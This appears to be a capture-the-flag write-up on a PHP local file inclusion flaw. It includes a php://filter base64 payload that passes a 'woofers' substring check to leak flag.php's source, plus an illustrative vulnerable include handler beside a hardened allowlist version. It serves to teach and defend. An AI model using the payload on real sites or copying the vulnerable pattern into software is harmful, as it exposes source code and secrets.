Opening the challenge, we notice a suspicious URL:
index.php?category=woofers
While testing the parameter, it appears that the server performs a file inclusion with a `.php` suffix appended:
index.php?category=woofers%20a
Warning: include(woofers a.php): failed to open stream: No such file or directory in /var/www/html/index.php on line 37
Warning: include(): Failed opening 'woofers a.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/index.php on line 37
The server also checks whether the `category` parameter contains `woofers` or `meowers`.
Try to bypass this check and read flag.php:
index.php?category=php://filter/convert.base64-encode/woofers/resource=flag
This returns the source code of flag.php.
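To show why the bypass above works and how the handler should have been written, here is an added illustration; it is not the challenge's actual source (the write-up does not show it). The include pattern is inferred from the warning `include(woofers a.php)`, which implies `.php` is appended to the raw parameter, and the substring check on `woofers`/`meowers` is assumed from the description. The function names and file paths are assumptions.

```php
<?php
// Added illustration, not the challenge's real code. Assumes the handler builds
// the include path as $_GET['category'] . '.php' after a substring check.

// Vulnerable pattern: a substring check followed by an include of a path built
// from user input. The check only proves the string *contains* "woofers";
// php://filter/convert.base64-encode/woofers/resource=flag satisfies it, and
// include() then reads flag.php through the base64 stream filter, so the
// file's source is emitted as text instead of being executed.
function include_category_vulnerable(string $category): void
{
    if (strpos($category, 'woofers') === false
        && strpos($category, 'meowers') === false) {
        exit('invalid category');
    }
    include $category . '.php';
}

// Hardened pattern: map the parameter onto a fixed allowlist of files and never
// build the include path from the request. Unknown values are rejected outright,
// so wrapper prefixes such as php:// or path traversal never reach include().
function include_category_safe(string $category): void
{
    $allowed = [
        'woofers' => __DIR__ . '/woofers.php',
        'meowers' => __DIR__ . '/meowers.php',
    ];
    if (!array_key_exists($category, $allowed)) {
        http_response_code(400);
        exit('invalid category');
    }
    include $allowed[$category];
}

include_category_safe($_GET['category'] ?? 'woofers');
```

Note that disabling `allow_url_include` in php.ini does not close this hole: `php://filter` is a local stream wrapper and remains available regardless of that setting. The effective mitigation is the allowlist lookup, which turns the parameter into a key rather than a path fragment.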